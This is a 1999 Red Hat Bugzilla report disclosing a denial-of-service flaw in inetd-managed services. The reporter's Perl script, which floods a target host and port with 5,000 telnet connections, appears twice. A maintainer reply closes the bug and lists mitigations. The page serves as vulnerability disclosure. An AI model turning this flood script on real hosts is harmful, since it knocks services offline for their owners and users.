Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 4005 - inetd D-O-S exploit
Summary: inetd D-O-S exploit
Keywords:
Status: CLOSED WONTFIX
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: netkit-base
Version: 6.0
Hardware: i386
OS: Linux
high
high
Target Milestone: ---
Assignee: Cristian Gafton
QA Contact:
URL:
Whiteboard:
: 4004 (view as bug list)
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1999-07-12 22:40 UTC by jjuarez
Modified: 2008-05-01 15:37 UTC (History)
1 user (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 1999-07-28 07:53:42 UTC


Attachments (Terms of Use)

Description jjuarez 1999-07-12 22:40:49 UTC
#!/usr/bin/perl
# Author: Jesus A. Juarez
#         Jul 1999
# e-mail: chuby@mail.com
# The Xploit attack to services under inetd daemon on the
# Linux  Box's, this cause the suspend of the services.
# The problem is on the inetd, telnet, ftp & sendmail, etc;
# daemon's, because this programs do not limit the number of
# calls by client. This causes that the service requested
# became down.
# Use it under your own risk.
# The TCP-WRAPPERS don't Fix this problem.
# Sintax:
#               DoS-TFS.pl <hostname> <port> <enter>
#               DoS-Telnet, FTP, Sendmail, etc.
# This code has beed tested from Linux to Linux Box's whith
# Perl  installed, I think'  that it run the same way on
# some Unix's or Windows System to damage some Linux Box's.
use Net::Telnet;
for ($i=0;$i<5000;$i++)
{
  $obj=Net::Telnet->new( Host => "$ARGV[0]",Port >
"$ARGV[1]");
  my $cmd = ".";
  $obj->print("$cmd");
  $obj->close;
}
#this problem will not be published.
# please notify me, when fix it. :)

Comment 1 Bill Nottingham 1999-07-13 14:22:59 UTC
*** Bug 4004 has been marked as a duplicate of this bug. ***

#!/usr/bin/perl
# Author: Jesus A. Juarez
#         Jul 1999
# e-mail: chuby@mail.com
# The Xploit attack to services under inetd daemon on the
# Linux  Box's, this cause the suspend of the services.
# The problem is on the inetd, telnet, ftp & sendmail, etc;
# daemon's, because this programs do not limit the number of
# calls by client. This causes that the service requested
# became down.
# Use it under your own risk.
# The TCP-WRAPPERS don't Fix this problem.
# Sintax:
#               DoS-TFS.pl <hostname> <port> <enter>
#               DoS-Telnet, FTP, Sendmail, etc.
# This code has beed tested from Linux to Linux Box's whith
# Perl  installed, I think'  that it run the same way on
# some Unix's or Windows System to damage some Linux Box's.
use Net::Telnet;
for ($i=0;$i<5000;$i++)
{
  $obj=Net::Telnet->new( Host => "$ARGV[0]",Port >
"$ARGV[1]");
  my $cmd = ".";
  $obj->print("$cmd");
  $obj->close;
}
#this problem will not be published.
# please notify me, when fix it. :)

Comment 2 Cristian Gafton 1999-07-28 07:53:59 UTC
inetd will shut down the services that are being over-used or come
under heavy network activity. One can use the wait/nowait.N to limit
the number of spawns for that service to N per second, but that is not
a effective protection against these types of attacks.

The kernel SYn cookies will also help here, but the only effective way
of protection is firewalling off the attacker.


Note You need to log in before you can comment on or make changes to this bug.